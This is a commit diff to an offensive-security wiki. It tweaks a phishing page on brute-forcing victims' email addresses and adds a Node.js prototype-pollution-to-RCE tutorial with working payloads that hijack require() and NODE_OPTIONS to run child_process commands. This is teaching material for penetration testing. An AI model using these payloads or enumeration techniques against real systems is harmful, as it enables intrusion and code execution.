GitBook: [#3463] No subject
This commit is contained in:
parent
ad3e575f33
commit
e23cfa1aad
@ -87,7 +87,7 @@ In order to make sure that the expired domain that you are going to buy **has al
|
||||
* [https://hunter.io/](https://hunter.io)
|
||||
* [https://anymailfinder.com/](https://anymailfinder.com)
|
||||
|
||||
In order to **discover more** valid email addresses or **verify the ones** you have already discovered you can check if you can brute-force them smtp servers of the victim. [Learn how to verify/discover email address here](../../network-services-pentesting/pentesting-smtp/#username-bruteforce-enumeration).\
|
||||
In order to **discover more** valid email addresses or **verify the ones** you have already discovered you can check if you can brute-force them smtp servers of the victim. [Learn how to verify/discover email address here](../../phishing-methodology/broken-reference/).\
|
||||
Moreover, don't forget that if the users use **any web portal to access their mails**, you can check if it's vulnerable to **username brute force**, and exploit the vulnerability if possible.
|
||||
|
||||
## Configuring GoPhish
|
||||
|
@ -159,8 +159,118 @@ var proc = fork('a_file.js');
|
||||
|
||||
## Forcing Spawn
|
||||
|
||||
In the previous examples you saw how to trigger the gadget a functionality that **calls `spawn`** needs to be **present** (all methods of **`child_process`** used to execute something calls it). In the previous example that was **part of the the code**, but what if the code **isn't** calling it.\
|
||||
In this [**other writeup**](https://blog.sonarsource.com/blitzjs-prototype-pollution/) the user can control the file path were a **`require`** will be executed. In that scenario the attacker just needs to **find a `.js` file inside the system** that will **execute an spawn method when imported**.
|
||||
In the previous examples you saw how to trigger the gadget a functionality that **calls `spawn`** needs to be **present** (all methods of **`child_process`** used to execute something calls it). In the previous example that was **part of the the code**, but what if the code **isn't** calling it.
|
||||
|
||||
### Controlling a require file path
|
||||
|
||||
In this [**other writeup**](https://blog.sonarsource.com/blitzjs-prototype-pollution/) the user can control the file path were a **`require`** will be executed. In that scenario the attacker just needs to **find a `.js` file inside the system** that will **execute an spawn method when imported.**\
|
||||
****Some examples of common files calling a spawn function when imported are:
|
||||
|
||||
* /path/to/npm/scripts/changelog.js
|
||||
* /opt/yarn-v1.22.19/preinstall.js
|
||||
|
||||
### Setting require file path via prototype pollution
|
||||
|
||||
{% hint style="warning" %}
|
||||
The **previous technique requires** that the **user controls the path of the file** that is going to be **required**. But this is not always true.
|
||||
{% endhint %}
|
||||
|
||||
However, if the code is going to execute a require after the prototype pollution, even if you **don't control the path** that is going to be require and this **path is relative**, you **can force a different one abusing propotype pollution**. So even if the code line is like `require("./a_file.js")` it will **required the package you set**.
|
||||
|
||||
Therefore, if a require is executed after your prototype pollution and no spawn function, this is the attack:
|
||||
|
||||
* Find a **`.js` file inside the system** that when **required** will **execute something using `child_process`**
|
||||
* If you can upload files to the platform you are attacking you might upload a file like that
|
||||
* Pollute the paths to **force the require load of the `.js` file** that will execute something with child\_process
|
||||
* **Pollute the environ/cmdline** to execute arbitrary code when a child\_process execution function is called (see the initial techniques)
|
||||
|
||||
#### Method 1 to set arbitrary require
|
||||
|
||||
{% tabs %}
|
||||
{% tab title="exploit" %}
|
||||
{% code overflow="wrap" %}
|
||||
```javascript
|
||||
// Create a file called malicious.js in /tmp
|
||||
// Contents of malicious.js in the other tab
|
||||
|
||||
// Manual Pollution
|
||||
b = {}
|
||||
b.__proto__.exports = { ".": "./malicious.js" }
|
||||
b.__proto__["1"] = "/tmp"
|
||||
|
||||
// Trigger gadget
|
||||
var proc = require('./relative_path.js');
|
||||
// This should execute the file /tmp/malicious.js
|
||||
// The relative path doesn't even need to exist
|
||||
|
||||
|
||||
// Abusing the vulnerable code
|
||||
USERINPUT = JSON.parse('{"__proto__": {"exports": {".": "./malicious.js"}, "1": "/tmp", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce2\\\").toString())//"}}')
|
||||
|
||||
clone(USERINPUT);
|
||||
|
||||
var proc = require('./relative_path.js');
|
||||
// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec
|
||||
```
|
||||
{% endcode %}
|
||||
{% endtab %}
|
||||
|
||||
{% tab title="malicious.js" %}
|
||||
```javascript
|
||||
const { fork } = require('child_process');
|
||||
console.log("Hellooo from malicious");
|
||||
fork('/path/to/anything');
|
||||
```
|
||||
{% endtab %}
|
||||
{% endtabs %}
|
||||
|
||||
#### Method 2 to set arbitrary require
|
||||
|
||||
{% tabs %}
|
||||
{% tab title="exploit" %}
|
||||
{% code overflow="wrap" %}
|
||||
```javascript
|
||||
// Create a file called malicious.js in /tmp
|
||||
// Contents of malicious.js in the other tab
|
||||
|
||||
// Manual Pollution
|
||||
b = {}
|
||||
b.__proto__.data = {}
|
||||
b.__proto__.data.exports = { ".": "./malicious.js" }
|
||||
b.__proto__.path = "/tmp"
|
||||
b.__proto__.name = "./relative_path2.js" //This needs to be the relative path that will be imported in the require
|
||||
|
||||
// Trigger gadget
|
||||
var proc = require('./relative_path.js');
|
||||
// This should execute the file /tmp/malicious.js
|
||||
// The relative path doesn't even need to exist
|
||||
|
||||
|
||||
// Abusing the vulnerable code
|
||||
USERINPUT = JSON.parse('{"__proto__": {"data": {"exports": {".": "./malicious.js"}}, "path": "/tmp", "name": "./relative_path.js", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce2\\\").toString())//"}}')
|
||||
|
||||
clone(USERINPUT);
|
||||
|
||||
var proc = require('./relative_path.js');
|
||||
// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec
|
||||
```
|
||||
{% endcode %}
|
||||
{% endtab %}
|
||||
|
||||
{% tab title="malicious.js" %}
|
||||
```javascript
|
||||
const { fork } = require('child_process');
|
||||
console.log("Hellooo from malicious");
|
||||
fork('/path/to/anything');
|
||||
```
|
||||
{% endtab %}
|
||||
{% endtabs %}
|
||||
|
||||
## References
|
||||
|
||||
* [https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)
|
||||
* [https://blog.sonarsource.com/blitzjs-prototype-pollution/](https://blog.sonarsource.com/blitzjs-prototype-pollution/)
|
||||
* [https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf)
|
||||
|
||||
<details>
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user